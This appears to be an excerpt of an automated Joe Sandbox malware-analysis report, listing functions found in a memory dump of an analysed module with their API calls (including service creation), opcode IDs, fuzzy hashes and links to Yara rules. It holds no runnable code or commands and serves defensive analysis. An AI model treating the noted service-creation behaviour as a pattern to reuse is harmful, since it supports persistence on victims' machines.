                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EED000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EF1000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EF6000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796417453.0000000069EF8000.00000020.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796635921.0000000069F04000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797586711.0000000069F44000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797638432.0000000069F45000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797741855.0000000069F4A000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797786351.0000000069F4B000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798016442.0000000069F5A000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798062740.0000000069F5B000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798104542.0000000069F5C000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_69e80000_DC1FFAF.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: CountTick$Sleep
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 4250438611-0
                                                                                                                                      • Opcode ID: 6231e7a228f71d2634e6556179f28fea7d8ab958810eba8f77cdab9b977166fd
                                                                                                                                      • Instruction ID: 6b7eccf2c081c3eaf7ae6edb6d5ea8474b541c97c869cc2fbf7a258f7d4c02e1
                                                                                                                                      • Opcode Fuzzy Hash: 6231e7a228f71d2634e6556179f28fea7d8ab958810eba8f77cdab9b977166fd
                                                                                                                                      • Instruction Fuzzy Hash: 891106B4C747898BC3219F3D898412ABAE4AB06704B3CC92DE0EA83381D770E440CB52
                                                                                                                                      Function 69EB6E04 Relevance: 4.5, APIs: 3, Instructions: 38COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.4794015728.0000000069E81000.00000020.00000001.01000000.00000012.sdmp, Offset: 69E80000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.4793863028.0000000069E80000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4795599242.0000000069EDA000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EED000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EF1000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EF6000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796417453.0000000069EF8000.00000020.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796635921.0000000069F04000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797586711.0000000069F44000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797638432.0000000069F45000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797741855.0000000069F4A000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797786351.0000000069F4B000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798016442.0000000069F5A000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798062740.0000000069F5B000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798104542.0000000069F5C000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_69e80000_DC1FFAF.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: ab25bc7ff38c54725b19241596c348cb2affc25219c5851de17a834b7d1eec57
                                                                                                                                      • Instruction ID: 50228cadea33d7c84de6b64b44115a21307a927c012835edfdf3880aaeee79e0
                                                                                                                                      • Opcode Fuzzy Hash: ab25bc7ff38c54725b19241596c348cb2affc25219c5851de17a834b7d1eec57
                                                                                                                                      • Instruction Fuzzy Hash: E4F0A431500048ABDF029FA0CE08A9E3F7DFF01B68B508014F815CD068DB31C716EB50
                                                                                                                                      Function 69E87980 Relevance: 4.5, APIs: 3, Instructions: 26serviceCOMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      • CreateServiceA.ADVAPI32(00000000,?,?,000F01FF,00000001,00000001,00000001,?,00000000,00000000,00000000,00000000,00000000,69E87AF9), ref: 69E87999
                                                                                                                                      • GetLastError.KERNEL32 ref: 69E879A3
                                                                                                                                      • CloseServiceHandle.ADVAPI32(00000000), ref: 69E879B7
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.4794015728.0000000069E81000.00000020.00000001.01000000.00000012.sdmp, Offset: 69E80000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.4793863028.0000000069E80000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4795599242.0000000069EDA000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EED000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EF1000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EF6000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796417453.0000000069EF8000.00000020.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796635921.0000000069F04000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797586711.0000000069F44000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797638432.0000000069F45000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797741855.0000000069F4A000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797786351.0000000069F4B000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798016442.0000000069F5A000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798062740.0000000069F5B000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798104542.0000000069F5C000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_69e80000_DC1FFAF.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: Service$CloseCreateErrorHandleLast
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 2127812319-0
                                                                                                                                      • Opcode ID: 12df415cdf0788b0101440b1047f606a04782faf57e2a1b05b64283773384b22
                                                                                                                                      • Instruction ID: 58c907664e22456dab4465d8b8eb6d749d45b03016e9c12ee7f9938efe9b1d87
                                                                                                                                      • Opcode Fuzzy Hash: 12df415cdf0788b0101440b1047f606a04782faf57e2a1b05b64283773384b22
                                                                                                                                      • Instruction Fuzzy Hash: DFD05EB47D0350BFFF1407309D8EFAA341EAB05F12F50046CB60AD81C0D6EA8984D520
                                                                                                                                      Function 69E88BA0 Relevance: 4.5, APIs: 3, Instructions: 24serviceCOMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      • CreateServiceA.ADVAPI32(00000000,?,?,000F01FF,00000001,00000001,00000001,?,00000000,00000000,00000000,00000000,00000000,69E88C1E), ref: 69E88BB9
                                                                                                                                      • GetLastError.KERNEL32(?,?,000F01FF,00000001,00000001,00000001,?,00000000,00000000,00000000,00000000,00000000,69E88C1E), ref: 69E88BC3
                                                                                                                                      • CloseServiceHandle.ADVAPI32(00000000,?,?,000F01FF,00000001,00000001,00000001,?,00000000,00000000,00000000,00000000,00000000,69E88C1E), ref: 69E88BD3
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.4794015728.0000000069E81000.00000020.00000001.01000000.00000012.sdmp, Offset: 69E80000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.4793863028.0000000069E80000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4795599242.0000000069EDA000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EED000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EF1000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EF6000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796417453.0000000069EF8000.00000020.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796635921.0000000069F04000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797586711.0000000069F44000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797638432.0000000069F45000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797741855.0000000069F4A000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797786351.0000000069F4B000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798016442.0000000069F5A000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798062740.0000000069F5B000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798104542.0000000069F5C000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_69e80000_DC1FFAF.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: Service$CloseCreateErrorHandleLast
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 2127812319-0
                                                                                                                                      • Opcode ID: e7d3828f28b9b529ea684638126ed550ceaf59017e2c854c26c9f95f6f1de01b
                                                                                                                                      • Instruction ID: 45bb6a5d7e28ed4a7b814783cb9dd264fa997ce718e196f05665b0beae0afdba
                                                                                                                                      • Opcode Fuzzy Hash: e7d3828f28b9b529ea684638126ed550ceaf59017e2c854c26c9f95f6f1de01b
                                                                                                                                      • Instruction Fuzzy Hash: A8D0A7B87D0340BEFE110B709E4EFAB351EBB41F52F800408F605E81C0C6ED45489430
                                                                                                                                      Function 69EA5C20 Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 123COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      Strings
                                                                                                                                      • %02x%02x%02x%02x%02x%02x%02x%02x%02x%02x%02x%02x%02x%02x%02x%02x, xrefs: 69EA5D60
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.4794015728.0000000069E81000.00000020.00000001.01000000.00000012.sdmp, Offset: 69E80000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.4793863028.0000000069E80000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4795599242.0000000069EDA000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EED000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EF1000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EF6000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796417453.0000000069EF8000.00000020.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796635921.0000000069F04000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797586711.0000000069F44000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797638432.0000000069F45000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797741855.0000000069F4A000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797786351.0000000069F4B000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798016442.0000000069F5A000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798062740.0000000069F5B000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798104542.0000000069F5C000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_69e80000_DC1FFAF.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: wsprintf
                                                                                                                                      • String ID: %02x%02x%02x%02x%02x%02x%02x%02x%02x%02x%02x%02x%02x%02x%02x%02x
                                                                                                                                      • API String ID: 2111968516-3431257331
                                                                                                                                      • Opcode ID: a4971471b5282e92744a4432a2793f7586be2637b933373f4a1cbd76614ec5fc
                                                                                                                                      • Instruction ID: 62cb141795df2c155e5ed6cd9951988d8b131e17160390f5398b06ca607d250c
                                                                                                                                      • Opcode Fuzzy Hash: a4971471b5282e92744a4432a2793f7586be2637b933373f4a1cbd76614ec5fc
                                                                                                                                      • Instruction Fuzzy Hash: DB31D6B5A183115BC308CB2E9C4482F76E6ABC8301F508A2DF889D7385E638DE15C7F6
                                                                                                                                      Function 69E9E3F0 Relevance: 3.1, APIs: 2, Instructions: 102comCOMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      • CoCreateInstance.OLE32(69EDDF60,00000000,00000001,69EDDF50,?,?), ref: 69E9E429
                                                                                                                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000104), ref: 69E9E47F
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.4794015728.0000000069E81000.00000020.00000001.01000000.00000012.sdmp, Offset: 69E80000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.4793863028.0000000069E80000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4795599242.0000000069EDA000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EED000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EF1000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EF6000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796417453.0000000069EF8000.00000020.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796635921.0000000069F04000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797586711.0000000069F44000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797638432.0000000069F45000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797741855.0000000069F4A000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797786351.0000000069F4B000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798016442.0000000069F5A000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798062740.0000000069F5B000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798104542.0000000069F5C000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_69e80000_DC1FFAF.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: ByteCharCreateInstanceMultiWide
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 123533781-0
                                                                                                                                      • Opcode ID: 3b9c2c25847053b8a508aaa6c17655800e626eb463e53e473a050e92d6c43656
                                                                                                                                      • Instruction ID: 75a1721013a26b637ff49698b6b1f4fba4749e5b53afd6f76960d1bc014a0d2c
                                                                                                                                      • Opcode Fuzzy Hash: 3b9c2c25847053b8a508aaa6c17655800e626eb463e53e473a050e92d6c43656
                                                                                                                                      • Instruction Fuzzy Hash: 10316875604705AFC210CB68C881FAA73E8BFC9724F108A4CFA59CB390D631ED41CB92
                                                                                                                                      Function 69E89120 Relevance: 2.4, APIs: 1, Instructions: 913COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.4794015728.0000000069E81000.00000020.00000001.01000000.00000012.sdmp, Offset: 69E80000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.4793863028.0000000069E80000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4795599242.0000000069EDA000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EED000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EF1000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EF6000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796417453.0000000069EF8000.00000020.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796635921.0000000069F04000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797586711.0000000069F44000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797638432.0000000069F45000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797741855.0000000069F4A000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797786351.0000000069F4B000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798016442.0000000069F5A000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798062740.0000000069F5B000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798104542.0000000069F5C000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_69e80000_DC1FFAF.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: _memset
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 2102423945-0
                                                                                                                                      • Opcode ID: 95e39fd36ee212415655dd6de8832b980a4dc5f2a95bd70b8a5c9ebc8d950729
                                                                                                                                      • Instruction ID: 55998a8efc8c2b3ce748d4dfbce9df2e6012a5baf8885a879df4d122d8eb5799
                                                                                                                                      • Opcode Fuzzy Hash: 95e39fd36ee212415655dd6de8832b980a4dc5f2a95bd70b8a5c9ebc8d950729
                                                                                                                                      • Instruction Fuzzy Hash: 3192A275605A028FD72CCF0AD5A0966F7E2FF88314328D96DD0AB87B59DA34B446CF84
                                                                                                                                      Function 69E89B90 Relevance: 2.2, APIs: 1, Instructions: 726COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.4794015728.0000000069E81000.00000020.00000001.01000000.00000012.sdmp, Offset: 69E80000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.4793863028.0000000069E80000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4795599242.0000000069EDA000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EED000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EF1000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EF6000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796417453.0000000069EF8000.00000020.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796635921.0000000069F04000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797586711.0000000069F44000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797638432.0000000069F45000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797741855.0000000069F4A000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797786351.0000000069F4B000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798016442.0000000069F5A000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798062740.0000000069F5B000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798104542.0000000069F5C000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_69e80000_DC1FFAF.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: __fread_nolock
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 2638373210-0
                                                                                                                                      • Opcode ID: c3f301c332583f097b9b2f21e0c5aa50df561b0825671483bcf7b7107b541440
                                                                                                                                      • Instruction ID: f61fb1d12922c3f4d88cc735eede1481b5c714256a7b7c337f37d632b8061807
                                                                                                                                      • Opcode Fuzzy Hash: c3f301c332583f097b9b2f21e0c5aa50df561b0825671483bcf7b7107b541440
                                                                                                                                      • Instruction Fuzzy Hash: 7342B3B7E503558FCB04CFAADCC0585B3E2FBD8308B2A9529D944C7305FAB96A059BD4
                                                                                                                                      Function 69E89BBC Relevance: 2.2, APIs: 1, Instructions: 686COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.4794015728.0000000069E81000.00000020.00000001.01000000.00000012.sdmp, Offset: 69E80000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.4793863028.0000000069E80000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4795599242.0000000069EDA000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EED000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EF1000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EF6000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796417453.0000000069EF8000.00000020.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796635921.0000000069F04000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797586711.0000000069F44000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797638432.0000000069F45000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797741855.0000000069F4A000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797786351.0000000069F4B000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798016442.0000000069F5A000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798062740.0000000069F5B000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798104542.0000000069F5C000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_69e80000_DC1FFAF.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: __fread_nolock
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 2638373210-0
                                                                                                                                      • Opcode ID: a739121841ad80c52f89b4209cb8cc8137ed0b8f44f537e3e8989f3d292d7aac
                                                                                                                                      • Instruction ID: 2f275a9b5e556968ec2bfaefa578568e59cd961d7672fec270f0656d33ae1379
                                                                                                                                      • Opcode Fuzzy Hash: a739121841ad80c52f89b4209cb8cc8137ed0b8f44f537e3e8989f3d292d7aac
                                                                                                                                      • Instruction Fuzzy Hash: 8B42A3B7E903558FCB04CFAADCC0185B3E2FBD830872A9529D944C7305FAB86A059BD0
                                                                                                                                      Function 69EBAC7F Relevance: 2.0, APIs: 1, Instructions: 452COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.4794015728.0000000069E81000.00000020.00000001.01000000.00000012.sdmp, Offset: 69E80000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.4793863028.0000000069E80000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4795599242.0000000069EDA000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EED000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EF1000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EF6000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796417453.0000000069EF8000.00000020.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796635921.0000000069F04000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797586711.0000000069F44000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797638432.0000000069F45000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797741855.0000000069F4A000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797786351.0000000069F4B000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798016442.0000000069F5A000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798062740.0000000069F5B000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798104542.0000000069F5C000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_69e80000_DC1FFAF.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: H_prolog3
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 431132790-0
                                                                                                                                      • Opcode ID: dc9f476d04568cf34546495b5b6c705e3b2de35ad0988fa850ab0eab472cf189
                                                                                                                                      • Instruction ID: 85c82ba427aaf3ab7952b1442c17177a8771b57f2b37ded640f0652e03c22c7c
                                                                                                                                      • Opcode Fuzzy Hash: dc9f476d04568cf34546495b5b6c705e3b2de35ad0988fa850ab0eab472cf189
                                                                                                                                      • Instruction Fuzzy Hash: 04F18C74940209EFDF05CF58CAC0ABE7BA9EF09368F208519F816AF255DB35D941DB60
                                                                                                                                      Function 69E97D20 Relevance: 1.6, Strings: 1, Instructions: 371COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.4794015728.0000000069E81000.00000020.00000001.01000000.00000012.sdmp, Offset: 69E80000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.4793863028.0000000069E80000.00000002.00000001.01000000.00000012.sdmpDownload File
